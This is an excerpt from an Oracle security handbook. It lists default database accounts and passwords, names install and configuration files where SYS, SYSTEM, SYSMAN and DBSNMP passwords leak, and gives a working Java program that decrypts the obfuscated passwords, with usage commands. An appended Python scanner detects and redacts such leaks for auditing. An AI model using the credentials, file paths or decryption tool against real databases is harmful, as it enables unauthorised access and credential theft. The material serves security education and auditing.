Oracle Hacker's Handbook. Hacking and Defending Oracle Authors: Litchfield D. Published year: 2004 Pages: 27/101 |
No other bit of software has more well-known default usernames and passwords than Oracle. Username and password combinations are the first line of defense an attacker will try to compromise to gain authenticated access to the system. The more common ones are as follows:
SYS/CHANGE_ON_INSTALL
SYSTEM/MANAGER
DBSNMP/DBSNMP
CTXSYS/CTXSYS
MDSYS/MDSYS
SCOTT/TIGER
A full list can be found in the appendix.
While it is not common to find the SYS or SYSTEM account with a default password, DBSNMP, the Intelligent Agent account, is often found to have the default password left intact. This is probably because the password needs to be changed in two places if you still want the Intelligent Agent to work. The first password change occurs in the database; the second password change needs to happen in the snmp_rw.ora file. CTXSYS and MDSYS, both DBAs in 9i, are often found with their default passwords left intact, too, though not as often as DBSNMP.
With the introduction of 10g, the situation improved drastically. During the install process, the installer is prompted for a password for the SYS account. This same password can then be set for the SYSTEM, DBSNMP, and SYSMAN accounts, too. All other accounts are set to EXPIRED and LOCKED. EXPIRED means the default password has expired and must be changed. However, for the default accounts and the default profile, the password can be changed back to its original value. People often do this so their older applications, which use hardcoded passwords, still work.
As it is still trivial to gain DBA privileges from any account that can connect to the database, every account should be protected with a strong password - and this should be enforced with a password complexity function set from the profile. Account lockout after a number of failed login attempts should also be considered for normal user accounts - care must be taken with application accounts. See the chapter on "Securing Oracle" in the Database Hacker's Handbook for more information.
Although the password situation has improved in 10g, risks remain. One such risk is that the password chosen during installation is written to certain files. For example, in 10g Release 1, the password for SYSMAN is written to the emoms.properties file in the $ORACLE_HOME/hostname_sid/sysman/config directory in clear text; 10g Release 2 uses DES to encrypt the password but the emoms file also contains the decryption key, so the password can still be retrieved: just plug the emdRepPwd and emdRepPwdSeed properties into your nearest DES tool and out pops the clear-text password.
Another potential file where the password may be logged is postDBCreation.log. Suppose that during the install the installer chooses a hard-to-guess password with exclamation marks in it. When the passwords for the SYSMAN and DBSNMP accounts are set, the SQL script that does this executes the following:
alter user SYSMAN identified by f00bar!! account unlock
alter user DBSNMP identified by f00bar!! account unlock
Due to the exclamation marks, this causes an error, which is then logged:
ERROR at line 1:
ORA-00922: missing or invalid option
Because the passwords for the SYS and SYSTEM accounts are set in a different manner - one that doesn't cause an error - they are given this password. Thus, if someone can gain access to this file, then they might be able to discover the password for SYS and SYSTEM.
Another set of files in which passwords are logged is
$ORACLE_HOME/cfgtoollogs/cfgfw/CfmLogger_install_date.log
$ORACLE_HOME/cfgtoollogs/cfgfw/oracle.assistants.server_install_date.log
$ORACLE_HOME/cfgtoollogs/configToolAllCommands
$ORACLE_HOME/inventory/Components21/oracle.assistants.server/10.2.0.1.0/context.xml
$ORACLE_HOME/inventory/ContentsXML/ConfigXML/oracle.assistants.server.10_2_0_1_0.CFM.1.inst.xml
$ORACLE_HOME\cfgtoollogs\oui\installActions_install_date.log (Windows only)
where install_date specifies the date and time the servers were installed. However, these passwords are obfuscated and appear as follows: 05da3f3b20f9ee5e1e992d7d35d5c0c679. It is nevertheless a trivial matter to recover the clear-text password from this. The passwords for SYS, SYSTEM, SYSMAN, and DBSNMP can all be recovered from these files. The following Java calls the Checksum SHA function in the Checksum package. Note that the function does not perform a SHA operation. The leading 05 in the obfuscated password indicates to the code to use DES decryption. The next 16 characters form the key, and the next 16 form the password.
/*
$ cp DumpPassword.java /tmp/DumpPassword.java
$ cd /tmp
$ /oracle/product/10.1.0/Db_1/jdk/bin/javac -classpath /tmp:/oracle/product/10.1.0/Db_1/jlib/ /tmp/DumpPassword.java
$ /oracle/product/10.1.0/Db_1/jdk/bin/java -classpath /tmp:/oracle/product/10.1.0/Db_1/jlib/ DumpPassword 05da3f3b20f9ee5e1e992d7d35d5c0c679
Password is foobar
*/
import oracle.security.misc.Checksum;

class DumpPassword
{
    public static void main(String args[])
    {
        /* args[0] is the obfuscated string: "05" + 16 hex chars of key + 16 hex chars of password */
        byte b_in[] = HexToByteArray(args[0]);
        try
        {
            /* Whilst it says SHA - it's not!!! */
            byte b_out[] = Checksum.SHA(b_in, null);
            System.out.println("Password is " + ByteToHex(b_out));
        }
        catch(Exception e)
        {
            System.out.println("error");
        }
    }

    /* Despite the name, this returns the bytes as characters, not as hex digits */
    public static String ByteToHex(byte a[])
    {
        String s = "";
        for(int i = 0; i < a.length; i++)
        {
            s += (char)a[i];
        }
        return s;
    }

    /* Converts a hex string into the bytes it encodes, two characters per byte */
    public static byte[] HexToByteArray(String str)
    {
        if(str == null)
            return new byte[0];
        int len = str.length();
        char hex[] = str.toCharArray();
        byte buf[] = new byte[len / 2];
        for(int pos = 0; pos < len / 2; pos++)
            buf[pos] = (byte)(toData(hex[2 * pos]) << 4 & 0xf0 | toData(hex[2 * pos + 1]) & 0xf);
        return buf;
    }

    /* Value of a single hex digit, or -1 if the character is not a hex digit */
    private static byte toData(char c)
    {
        if('0' <= c && c <= '9')
            return (byte)((byte)c - 48);
        if('a' <= c && c <= 'f')
            return (byte)(((byte)c - 97) + 10);
        if('A' <= c && c <= 'F')
            return (byte)(((byte)c - 65) + 10);
        else
            return -1;
    }
}
Installing the 10g Application Server and grepping through the files shows that the following also have passwords obfuscated in the same manner:
$ORACLE_HOME\inventory\ContentsXML\configtools.xml
$ORACLE_HOME\cfgtoollogs\configtoolsinstalldate.log
$ORACLE_HOME\sysman\emd\targets.xml
$ORACLE_HOME\config\ias.properties
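An audit-side check for the leaks this section describes, added here as an example and not taken from the book: it scans file contents for a logged alter user ... identified by statement, the emdRepPwd and emdRepPwdSeed properties, and 05-prefixed tokens of 34 hex characters, and reports each finding with the secret redacted. The function names and the sample file contents are constructed for illustration; the 05... token is the example value quoted above.

```python
import os
import re

# Layout described above: "05" marker, 16 hex chars of key, 16 hex chars of password.
OBFUSCATED = re.compile(r"(?<![0-9A-Fa-f])05[0-9A-Fa-f]{32}(?![0-9A-Fa-f])")
# Clear-text password echoed into a log, as in the postDBCreation.log case.
ALTER_USER = re.compile(r"alter\s+user\s+(\w+)\s+identified\s+by\s+(\S+)", re.I)
# The two emoms.properties entries named for 10g Release 2.
EMOMS_PROP = re.compile(r"^\s*(emdRepPwd|emdRepPwdSeed)\s*=\s*(\S+)")

def redact(secret):  # report only the length, never the value itself
    return "<redacted, %d chars>" % len(secret)

def scan_text(name, text):
    """Return (file, line_no, kind, detail) tuples for one file's content."""
    found = []
    for no, line in enumerate(text.splitlines(), start=1):
        for m in OBFUSCATED.finditer(line):
            found.append((name, no, "obfuscated-password", redact(m.group(0))))
        for m in ALTER_USER.finditer(line):
            detail = "%s %s" % (m.group(1).upper(), redact(m.group(2)))
            found.append((name, no, "cleartext-password", detail))
        m = EMOMS_PROP.match(line)
        if m:
            found.append((name, no, "emoms-" + m.group(1), redact(m.group(2))))
    return found

def scan_tree(root):  # walk a directory tree, e.g. a copy of an ORACLE_HOME
    found = []
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(folder, fname)
            try:
                with open(path, errors="replace") as fh:
                    found.extend(scan_text(path, fh.read()))
            except OSError:
                continue  # unreadable file: nothing to report
    return found

# Constructed sample content; only the 05... token comes from the page.
SAMPLE = {
    "postDBCreation.log": "alter user SYSMAN identified by f00bar!! account unlock\n",
    "configToolAllCommands": "constructed line 05da3f3b20f9ee5e1e992d7d35d5c0c679 end\n",
    "emoms.properties": "emdRepPwd=constructedvalue\nemdRepPwdSeed=12345\n",
}

if __name__ == "__main__":
    for name, text in SAMPLE.items():
        print("\n".join("%s:%d %s %s" % f for f in scan_text(name, text)))
```

Any 34-character hex string beginning with 05 is flagged, so some false positives are expected. Files that produce findings are candidates for removal or tighter permissions, followed by a password change for the accounts concerned.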